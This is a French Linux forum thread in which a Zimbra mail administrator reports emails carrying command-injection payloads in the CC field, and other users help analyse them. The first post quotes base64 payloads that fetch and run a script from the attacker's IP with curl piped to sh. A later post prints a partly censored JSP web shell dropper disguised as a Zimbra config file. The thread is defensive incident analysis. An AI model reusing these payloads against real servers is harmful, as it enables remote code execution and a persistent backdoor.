Contenu | Rechercher | Menus

Annonce

Si vous avez des soucis pour rester connecté, déconnectez-vous puis reconnectez-vous depuis ce lien en cochant la case
Me connecter automatiquement lors de mes prochaines visites.

À propos de l'équipe du forum.

Pages : 1

#1 Le 01/10/2024, à 10:12

rospionne

[Zimbra] J'ai reçu un mail contenant un script sh dans CC

Bonjour,

J'ai reçu 4 mails contenant dans le champ CC un code bizard (Veuillez ne pas exécuter ce code, risque viral fort) :

CC: ppp`echo${IFS}Li4vLi4vY29tbW9uL2Jpbi9jdXJsIGh0dHA6Ly83OS4xMjQuNDkuODY6NDQzL2dwa3FyZmFwcWdxZ2Z0Zm52dmR4dnp5bm1yc2xsc2Np|base64${IFS}-d|sh`pppppp@mail.com,ppp`echo${IFS}L29wdC96aW1icmEvY29tbW9uL2Jpbi9jdXJsIGh0dHA6Ly83OS4xMjQuNDkuODY6NDQzL2dwa3FyZmFwcWdxZ2Z0Zm52dmR4dnp5bm1yc2xsc2Np|base64${IFS}-d|sh`pppppp@mail.com

Comment savoir si le serveur Zimbra a exécuter ou non ce genre de code ?

Merci d'avance.

Hors ligne

#2 Le 01/10/2024, à 10:27

tycooon

Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC

decode base 64 :
../../common/bin/curl http://xx.xx.xx.xx:443/gpkqrfapqgqgftfn … n/bin/curl
http://xx.xx.xx.xx:443/gpkqrfapqgqgftfnvvdxvzynmrsllsci
A mon avis ça pointe sur une adresse http qui est codée ci dessus en base 64 pour télécharger un script à cette adresse : curl http://xx.xx.xx.xx:443/gpkqrfapqgqgftfnvndxvzynmrslsc

Bien sur évitez de cliquer pour télécharger : \\\\\\Ne jamais exécuter ce genre de commandes /////

Dernière modification par tycooon (Le 01/10/2024, à 11:06)

Hors ligne

#3 Le 01/10/2024, à 10:29

LukePerp

Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC

Faut regarder les logs.
Ce truc a codé une commande utilisant curl. Cherche les logs ayant utilisé curl ainsi que l'adresse ip codé dans ce truc.

Gamer inside - Ubuntu Mate dernière LTS - Intel i5, 16 Go - Dual boot Windows - Ethereum user

Hors ligne

#4 Le 01/10/2024, à 10:55

rospionne

Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC

LukePerp a écrit :

Faut regarder les logs.
Ce truc a codé une commande utilisant curl. Cherche les logs ayant utilisé curl ainsi que l'adresse ip codé dans ce truc.

J'ai regardé les log correspondant au date de reception, j'ai juste l'historique de zimbra qui a reçu ces mails. Rien de plus.
J'ai créer une machine virtuel isolé pour tenter de télécharger son fichier (commande : curl x.x.x.x/hduiqhuizhduiqhd > virus.txt). Rien du tout. Un lien mort

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

J'ai décodé le premier mail qui a un code64 différent et beaucoup plus long (Veuillez ne pas exécuter ce code, d'après gémini, c'est un backdor) :

cd ../../jetty/webapps/zimbraAdmin/public/jsp/&&echo '
        <%@ page import="java.io.*,java.util.Base64,java.util.Map,java.util.HashMap,java.net.*"%>
        <% StringBuilder ot = new StringBuilder();
        class Utils{private final Map<String, String> rt = new HashMap<>();
        [...censuré...]}
        public String getCookie(String key){for(Cookie cookie:request.getCookies()){
        String name=cookie.getName();if(name!=null&&name.equals(key)){return cookie.getValue();}}return null;}
        public String decodeBase64(String text){if(text == null){return "";}
        try{String bdec = new String(Base64.getDecoder().decode(text));
        for(Map.Entry<String,String> entry:this.rt.entrySet()){bdec=bdec.replace(entry.getKey(),entry.getValue());}
        return bdec;}catch(Exception e){return "";}}}
        [...censuré...]
        <%=ot.toString()%>' > zimbraConfig.jsp && touch zimbraConfig.jsp -r Boot.jsp && chmod --reference=Boot.jsp zimbraConfig.jsp

J'ai donc vérifié dans le répertoire. la date de modification est ultérieur à la reception du mail et pas de présence de zimbraConfig.

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Conclusion :
Je pense que le pirate cherche une vulnérailité de mon serveur zimbra à travers le champ CC. Et que pour l'instant et heuresement, il a fait choux blanc.

D'après l'entête, dans Received, il utilise la même adresse IP : 79.124.49.86 . Je l'ai donc blacklisté sur mes pare-feux.

Dernière modification par rospionne (Le 01/10/2024, à 11:23)

Hors ligne

#5 Le 01/10/2024, à 11:22

tycooon

Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC

tu as regardé dans /opt/zimbra/common/bin/ si tu as quelque chose ? le curl point dans ce répertoire , il vaut mieux être prudent

Hors ligne

#6 Le 01/10/2024, à 11:26

rospionne

Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC

tycooon a écrit :

tu as regardé dans /opt/zimbra/common/bin/ si tu as quelque chose ? le curl point dans ce répertoire , il vaut mieux être prudent

Aucun fichier modifié ou créé cette années dans ce répertoire.
Et d'après la base64 du premier poste, il télécharge en sortie consol pour l'exécuter imédiatement.

Dernière modification par rospionne (Le 01/10/2024, à 11:28)

Hors ligne

#7 Le 01/10/2024, à 15:31

LukePerp

Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC

si ce code était effectivement dans le champ CC du mail, je vois aucune raison qu'il soit exécuté

Gamer inside - Ubuntu Mate dernière LTS - Intel i5, 16 Go - Dual boot Windows - Ethereum user

Hors ligne

#8 Le 03/10/2024, à 01:46

JusticeRage

Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC

Hello ! Je suis un chercheur en cybersécurité, il s'agit d'une tentative d'exploitation de vulnérabilité Zimbra récente (CVE-2024-45519).
Est-ce qu'il serait possible d'avoir une copie des divers blobs base64 complets, ici ou en MP ? Le code JSP complet m'intéresse particulièrement smile

Hors ligne

#9 Le 03/10/2024, à 11:14

rospionne

Re : [Zimbra] J'ai reçu un mail contenant un script sh dans CC

JusticeRage a écrit :

Vous pouvez faire une recherche google "Ivan Kwiatkowski". Je peux vous envoyer une preuve d'identité par MP si vous avez peur de... euh, je ne sais pas trop de quoi honnêtement mais je peux.
Ma démarche a pour but de comprendre ce que font les attaquants, les campagnes malveillantes en cours et les outils utilisés. C'est un domaine qui s'appelle la "threat intelligence".

Je vous ai envoyé la source du 1er mail contenant le code java en base64 en MP sur votre compte Twitter.

Pour ce qui était de la prudence à votre compte ubuntu-fr créé récement. Il est certaint qu'avoir ce code source ne suffit pas pour attaquer et qu'il n'y a aucune garantie qu'il fonctionne.
Toutefois, si une personne souhaite s'inspirer d'un travail d'un tiers pour son propre compte... Je ne voudrais pas qu'il ai accès au code aussi facilement.

D'où mes questions pour esquiver un éventuel social engineering.

Dernière modification par rospionne (Le 03/10/2024, à 11:15)

Hors ligne

Pages : 1